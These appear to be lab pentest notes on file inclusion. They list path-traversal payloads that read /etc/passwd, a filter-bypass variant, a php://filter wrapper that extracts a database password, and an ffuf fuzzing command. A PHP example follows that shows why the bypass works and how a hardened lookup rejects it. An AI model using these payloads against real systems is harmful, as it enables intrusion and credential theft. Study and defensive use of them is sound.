LFI/RFI
?=../../../../../../etc/passwd
# Bypass a filter that strips ../ in a single, non-recursive pass
?=..././..././..././..././..././etc/passwd
?=http://google.com
# API
/labs/api/fetchRecipe.php?filename=..././..././..././..././..././..././..././etc/passwd
# Returns the db configuration (base64-encoded),
# including the db password
/labs/fi0x02.php?filename=php://filter/convert.base64-encode/resource=..././db.php
ffuf -request api-req.txt -request-proto http -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt
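
Why the `..././` payloads above survive a single-pass `../` strip, and a file lookup that rejects them together with the `php://filter` and `http://` forms. This is an added example, not code from the labs or the original notes (PHP 8+); the function names, the temporary `recipes/` directory and the files in it are hypothetical and constructed for the demo.

```php
<?php
// Added example (PHP 8+). Function names and sandbox layout are hypothetical.

// Weak filter: one non-recursive pass, the behaviour the "..././" payload relies on.
function weak_sanitize(string $name): string {
    return str_replace('../', '', $name);
}

// Hardened lookup: no wrappers, canonicalise, then require containment in $base.
function resolve_safe(string $name, string $base): ?string {
    // Reject scheme-style input (php://, http://, ...) and NUL bytes outright.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $name) || str_contains($name, "\0")) {
        return null;
    }
    $baseReal = realpath($base);
    $full = realpath($base . DIRECTORY_SEPARATOR . $name); // false if path is missing
    if ($baseReal === false || $full === false) {
        return null;
    }
    // Compare canonical paths; the trailing separator stops /base-evil matching /base.
    if (!str_starts_with($full, $baseReal . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return is_file($full) ? $full : null;
}

// Constructed sandbox so the script runs offline.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
$base = $root . '/recipes';
mkdir($base, 0700, true);
file_put_contents($base . '/pasta.txt', "boil water\n");
file_put_contents($root . '/db.php', "<?php // constructed secret file\n");

$inputs = [
    'pasta.txt',
    '../db.php',
    '..././db.php',
    'php://filter/convert.base64-encode/resource=..././db.php',
    'http://google.com',
];
foreach ($inputs as $in) {
    $weak = weak_sanitize($in); // "..././db.php" collapses to "../db.php"
    $safe = resolve_safe($in, $base);
    printf("%-58s weak=%-58s safe=%s\n", $in, $weak, $safe === null ? 'REJECTED' : 'OK');
}
```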